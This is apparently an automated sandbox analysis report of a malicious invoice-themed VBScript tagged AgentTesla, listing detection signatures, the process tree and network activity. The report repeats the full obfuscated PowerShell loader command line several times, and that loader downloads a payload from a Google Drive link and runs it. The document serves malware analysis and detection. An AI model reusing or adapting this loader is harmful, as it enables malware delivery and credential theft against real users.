Edit tour

Windows Analysis Report
FACTURA 130424435.vbs

Overview

General Information

Sample name:	FACTURA 130424435.vbs
Analysis ID:	1427933
MD5:	361f71c64cdcf7f56f8e6c2389401b89
SHA1:	315b4b37555a2b0f82837a94753fbd36bad2f5fd
SHA256:	dbc99b1d313999e21fd15d8386d69d56067c2a578c9658fbff8f749e93f04eae
Tags:	AgentTeslavbs
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3900 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 1644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,t$JochuM,uktieButtytSvagha Hus,lTronplKultuiSugenftod laudvikcMerist HoveuMa,kirsextuePl.st.SekteHSkovbeTilbjaBe.ald matee Stalr.rivasSyzy [ Fusi$ zithM BaroaBaaddsRetiak onciStradnSpdbraA,odifDriftdLgdereH,brilKthibiT.kepnVggengVersieIdiotrLsten] Anth=Cytop$Muls.VInequeFyrintBo.hoe indirOpga.aEri.cnBolige Res s nysks ande ');$Demonstrerbares212=Antimeningococcic ' DeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutarsScimi,El.os$ ulvSkondes ombyte eazeSkarlrPredes otakEctopiFodb,belekteAttessB,ase) Bucc ';$Demonstrerbares212=$Toscana[1]+$Demonstrerbares212;$Ssterskibes=$Toscana[0];cairned (Antimeningococcic 'Sub a$Anflyg mpilun.ino SkrabSjuskaGalehlData,:BaglaSTripovProluoHe tyvInterlBarrapSaliclTro,seA jur= R ad(FgridTUnpa eAfknasTiaart Ster-enthrPSeizuaScopetItalihbegso Polyg$Err.tS,horesRetartStipeeMicrorGenfosminimkChattiStrikbKojaneDukkes ive)ka,ve ');while (!$Svovlple) {cairned (Antimeningococcic ' Sona$ Bi lgEpexelOmbygoS mpabMisc,aHervalTharb:Milkwa Uncel LedilFors.eMegawrA bilgBrystiEnd rsTubulkUndereJusti=Tragi$ ForltAffekr petiuUdbenefrer. ') ;cairned $Demonstrerbares212;cairned (Antimeningococcic 'VitelSb,odetCapitaThougrWispltBadel-FiberS IntelL ftfeFibroe PartpUindf D.age4Akter ');cairned (Antimeningococcic ' Svar$ForsygO tstl.orbioPla sbAccelaAm,lelBegga:C,ndeSBotanvPirrio orgivHrecelHeb,opHyperlQuotee ,ltr=Skvad(HolomTBordvetrapdsFlaprt cica-panatPC.eriaRser.tg,lloh Dis Ratem$B.skaS .etssOm,egt Patce.hamarBordesMiddekUdforiS ndebGast e I,dgs un o)Overl ') ;cairned (Antimeningococcic 'A ter$huffmg BrnelVindko alkubsvmmeaPe.fol,ikol:Overgb undeu HassgDroutsHlhjde,ortyrBlaaseS,kketBostt=Optak$ fa cg SvoglTaurooForhobLame.aTeknolWesse:SpaniH Le.evUninviGa.indFrikttJordsnReacciLysesnCl,mog ournecandlrReshanBortfePakke+Pecha+By el% Ndud$ NoniLU plyyMessin StrenIncineCentedT rbasHypoclEnfana PhysgVenipeTrag npseu,e,transConfe1Unhe,6 Span.Grif,cHaando MannuTjrslnGunsttPrpar ') ;$Trngendes=$Lynnedslagenes16[$bugseret];}cairned (Antimeningococcic 'Tilba$CatapgDejeclWaysioContobErgoma Mot lBandl:NonreC licehHurtir Lg,koDulutmApproeT ivlpmeddllSan taTh,matUncu.eOve.rdBasal atro = Alis OrddaGBak.de MidttRicke-BlafrCPrecioreh.bnflappt Pas,e,aedanDudlettrprv Unart$PrismSMalaxsMeliot Carbe,onfor Appesstay k SamoiMarrob Supee phars A in ');cairned (Antimeningococcic 'T.rap$PraedgVlgerlUnprooBuks.bSta,sasoc,olFl,me:,ichlD Kropo Slagedermo Anglo=Pru.t ,romi[Squi.S SmalyForslsM liet heateF rtimDunde. TroeCTinfooP litnChubbv ammeeLder,r C.nvtSl,ve].olyc:smelt: S.brF JenbrPompsosognemOctoaB MezuaDriftsEmblee Debi6Besky4Caco,S ispetGlendr Gr diChantn,raktg Shop(Au or$S steCCumbrh DisprK.ldkoRescimOdileeVr,iapC taglOmegnaSanittConfeePirkldAro.a)Zoril ');cairned (Antimeningococcic ' U,fl$Snickg Belul.annioC.rysbdefa,aTrvarlPreco: OmelWBrutaiZa.zutSchtihGenaunPrinsaCont,y Ugen Omar.=Aconi Drows[AreteSUdby yZi,zasTr.klt OvereAnthrmFje.n. ilbuTTaggeeNarcox .vertSa sr. Kon.EBochen SkelcSt,rnoReexpdbi.oiiPre onPaga gefter]Scra :Samti:J venAHerreSunderCth.rmIC iasIIrked. OverGMicroe .nditInspiSLd,amt Pla,rTussoiparamnHet,agJordl( Afme$ LageD Hytvo gelsebaand)Spytk ');cairned (Antimeningococcic 'Sinec$CuspygLiderlSineboR,ngeb vareaT.gthlAf,it:NegerHFrifiaStikkr En reAndensProagkNonpeaNo.liaswi hr Lobesforpu= r.al$Sk.leWSn.taiXylyltRejs,hAutocn issaUpbanyVi.se.Beechs AnaluFilmubTergesciv.lt Er,ir KrysiScripn DestgA non(Ce lp3Hiv.u0 Hvin1Merri6 Samt8 ues5Praes,,arbo2Baiss8Chifr3Outro0B,nzi4elect) Sani ');cairned $Hareskaars;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1628 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 1644	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x60680:$b2: ::FromBase64String( 0x6227c:$b2: ::FromBase64String( 0x7796d:$b2: ::FromBase64String( 0x77a74:$b2: ::FromBase64String( 0x20eb94:$b2: ::FromBase64String( 0x20ebc7:$b2: ::FromBase64String( 0x20ebfb:$b2: ::FromBase64String( 0x20ec30:$b2: ::FromBase64String( 0x20ec66:$b2: ::FromBase64String( 0x20ec9d:$b2: ::FromBase64String( 0x20ecd5:$b2: ::FromBase64String( 0x20ed0e:$b2: ::FromBase64String( 0x20ed48:$b2: ::FromBase64String( 0x20ed83:$b2: ::FromBase64String( 0x20edbf:$b2: ::FromBase64String( 0x20edfc:$b2: ::FromBase64String( 0x20ee3a:$b2: ::FromBase64String( 0x20ee79:$b2: ::FromBase64String( 0x20eeb9:$b2: ::FromBase64String( 0x20f007:$b2: ::FromBase64String( 0x28d6e6:$b2: ::FromBase64String(

Other

Source	Rule	Description	Author	Strings
amsi64_1644.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe225:$b2: ::FromBase64String( 0xd24b:$s1: -join 0x69f7:$s4: += 0x6ab9:$s4: += 0xace0:$s4: += 0xcdfd:$s4: += 0xd0e7:$s4: += 0xd22d:$s4: += 0xf658:$s4: += 0xf6d8:$s4: += 0xf79e:$s4: += 0xf81e:$s4: += 0xf9f4:$s4: += 0xfa78:$s4: += 0xda2d:$e4: Get-WmiObject 0xdc1c:$e4: Get-Process 0xdc74:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", ProcessId: 3900, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", ProcessId: 3900, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: FACTURA 130424435.vbs	ReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbs	Virustotal: Detection: 11%			Perma Link

Source: unknown	HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2

Source:	Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1364056176.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364907873.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1375982993.0000013D6D270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab(
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.De
Source: wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef167
Source: wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
